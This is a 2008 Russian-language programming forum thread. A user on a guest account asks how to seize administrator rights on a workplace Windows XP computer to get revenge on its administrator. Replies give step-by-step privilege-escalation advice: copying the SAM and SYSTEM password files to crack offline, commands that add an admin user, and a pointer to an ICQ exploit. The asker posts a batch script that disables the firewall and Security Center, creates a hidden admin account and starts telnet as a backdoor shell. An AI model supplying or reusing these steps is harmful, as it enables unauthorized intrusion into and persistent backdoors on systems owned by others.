Visual Basic, .NET, ASP, VBScript
 

   
   
     

Форум - Офф-топ

Страница: 1 |

 

  Вопрос: ВыньХП ;) Добавлено: 01.03.08 21:41  

Автор вопроса:  Hunter
Я конечно понимаю, что вопрос в сущности даж отдаленно не затрагивает вб ... но все же хелпните ...

Итак, начнемс ...

Есть: руки 2шт, виндаХП (сп2) 1шт, тупой админ(ну очень тупой, но все же не полный ламо), злой юзер(то есть я), usb-port, nod32, dr.web

Нету: Доступа к админке, флопика, сидирома.

То есть стандартная композиция получается - учетка гостя + пара-тройка настроек от админа(запрет автозапуска и чет там еще), но реестр открыт(естественно, что привилегии гостя), диспетчер не блочен

НАДО: получить админку(привилегии админа), желательно использую баги винды

Посоветуйте, что можна предпринять ? и какие баги и самое главное как использовать ???

p.s еще раз повторю - желательно использовать баги винды и получить цмд с правами админа или создать нового админа ... ток не над предлагать СИ - не прокатит(админ хоть и тупой, все же койчего и понимает) у антивирусов базы дет середины 2007 ...

p.p.s хочу проучить админа за его тупость + за то, что он удалил вб с компов ((( даж заняться нечем ...

Заранее спс за хелп )))

Ответить

  Ответы Всего ответов: 14  

Номер ответа: 1
Автор ответа:
 ZagZag



ICQ: 295002202 

Вопросов: 87
Ответов: 1684
 Профиль | | #1 Добавлено: 02.03.08 02:17
Если сидиром отключен на программном уровне (винда, права), то можно попробовать загрузиться с Live-CD, и с него творить все что захочется.

Ответить

Номер ответа: 2
Автор ответа:
 Morpheus



Вопросов: 224
Ответов: 3777
 Web-сайт: xury.zx6.ru
 Профиль | | #2
Добавлено: 02.03.08 02:20
А не подумывал ему просто на стул клея налить или что-то в этом роде?

Ответить

Номер ответа: 3
Автор ответа:
 Morpheus



Вопросов: 224
Ответов: 3777
 Web-сайт: xury.zx6.ru
 Профиль | | #3
Добавлено: 02.03.08 02:24
п.с. вопрос прикольный

Ответить

Номер ответа: 4
Автор ответа:
 Hunter



Вопросов: 23
Ответов: 71
 Профиль | | #4 Добавлено: 02.03.08 04:13
Сидюка нету ((( а лайв сиди есть ))) WinPE ... с флешки почемуто не грузит - в биосе настраивал ... не пашет и все! Проверял образ - грит се норм - дома проверял - тож пашет (ток биосы разные) Дома у мя AT ... а тут award - причем есть бут с флехи - но не грузит!

Ответить

Номер ответа: 5
Автор ответа:
 Hunter



Вопросов: 23
Ответов: 71
 Профиль | | #5 Добавлено: 02.03.08 04:13
А не подумывал ему просто на стул клея налить или что-то в этом роде?


Увахаххахахаха ... неееее я ему на программном уровне отомстить хачу ))))))

Ответить

Номер ответа: 6
Автор ответа:
 Hunter



Вопросов: 23
Ответов: 71
 Профиль | | #6 Добавлено: 02.03.08 04:14
Какие ток баги не пересмаривал - не пашут ((( Правда на некоторых компах вб остался - мож че посоветуете - как никак у вб помоему права системы есть ... иногда )))

Ответить

Номер ответа: 7
Автор ответа:
 Morpheus



Вопросов: 224
Ответов: 3777
 Web-сайт: xury.zx6.ru
 Профиль | | #7
Добавлено: 02.03.08 04:53
посоветуй поставить ему асю6 и пошли туда %020000000s

(подробности на яндексе, или например тут: http://www.securitylab.ru/vulnerability/347732.php или тут http://bugtraq.ru/rsn/archive/2008/02/07.html)

Ответить

Номер ответа: 8
Автор ответа:
 ZagZag



ICQ: 295002202 

Вопросов: 87
Ответов: 1684
 Профиль | | #8 Добавлено: 02.03.08 11:47
Грузись с дискетки с поддержкой NTFS (если NTFS стоит).
Копируй из C:\WINDOWS\repair\ файлы SAM и software
Дома их скормишь проге SAMInside
В результате получишь пароли локальных юзерей компа

Ответить

Номер ответа: 9
Автор ответа:
 Hunter



Вопросов: 23
Ответов: 71
 Профиль | | #9 Добавлено: 02.03.08 15:06
Грузись с дискетки с поддержкой NTFS (если NTFS стоит).


флопика нету (((

посоветуй поставить ему асю6 и пошли туда %020000000s

(подробности на яндексе, или например тут: http://www.securitylab.ru/vulnerability/347732.php или тут http://bugtraq.ru/rsn/archive/2008/02/07.html)



компы клиентские - инета нет (((

Ответить

Номер ответа: 10
Автор ответа:
 Hunter



Вопросов: 23
Ответов: 71
 Профиль | | #10 Добавлено: 02.03.08 15:09
Копируй из C:\WINDOWS\repair\ файлы SAM и <s>software</s>


SAM и SYSTEM ... небольшая ошибочка

Ответить

Номер ответа: 11
Автор ответа:
 ZagZag



ICQ: 295002202 

Вопросов: 87
Ответов: 1684
 Профиль | | #11 Добавлено: 02.03.08 15:38
Да-да. Ошибочка.
А какой смысл тогда компы ломать, если на них ничего нет?
Остается только с флешки грузиться или внешний флопик или CD-ROM притащить ;)

Хотя еще можно попробовать в консоли вбить

net user YOURUSER YOURPASS /add >> Add_admin.txt
net localgroup Administrator YOURUSER /add >> Add_admin.txt
net group ";Domain Admins" YOURUSER /add >> Add_admin.txt

http://www.governmentsecurity.org/archive/t9255.html

Ответить

Номер ответа: 12
Автор ответа:
 Hunter



Вопросов: 23
Ответов: 71
 Профиль | | #12 Добавлено: 02.03.08 18:39
net user YOURUSER YOURPASS /add >> Add_admin.txt
net localgroup Administrator YOURUSER /add >> Add_admin.txt
net group ";Domain Admins" YOURUSER /add >> Add_admin.txt


Ну эт права нужны ((( + русская версия - там траблы с кодировкой = у меня бач есть - там ентой фигни немерено )))

вот зацените )))

@echo off

if not exist \LOGZ md \LOGZ >nul

echo COMP: %computername% & USER: %username% & D&T: %date% %time% >> \LOGZ\%computername%_log.log 2>&1

ipconfig /all >> \logfiles\%computername%_log.log 2>&1

sc config wscsvc start= disabled
sc config SharedAccess start= disabled
sc config tlntsvr start= auto
sc stop wscsvc
sc stop SharedAccess
sc start tlntsvr
net user USR ADM /add
net localgroup Ђ¤¬ЁЁбва в®ал USR /add
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v USR /t REG_DWORD /d 0 /f

exit

Во первых, создается лог файл с именем компа + инфа о ip-адресе и тп и тд

Во вторых, создается пользователь USR с пасом PWD ...

В третьих, юзер USR невидим при старте винды(паиб Билли ;))

В четвертых, стартует телнет, то есть у тя есть шелл с правами админа )))

И все равно это не покатит ((( Над дыру эксплуатировать __)))

Ответить

Номер ответа: 13
Автор ответа:
 Hunter



Вопросов: 23
Ответов: 71
 Профиль | | #13 Добавлено: 02.03.08 18:41
Пардон, не
ipconfig /all >> \logfiles\%computername%_log.log 2>&1


а вот так

ipconfig /all >> \LOGZ \%computername%_log.log 2>&1

Ответить

Номер ответа: 14
Автор ответа:
 Programmer



Вопросов: 71
Ответов: 246
 Профиль | | #14 Добавлено: 08.03.08 22:14
Если админ тупой, то у него отдельный профиль, а профиль "Администратор";(который обычно не виден при старте винды) не имеет пароля. Грузшь винды, C-A-D, C-A-D, логин - Administrator/Администратор.

Ответить

Страница: 1 |

Поиск по форуму



© Copyright 2002-2011 VBNet.RU | Пишите нам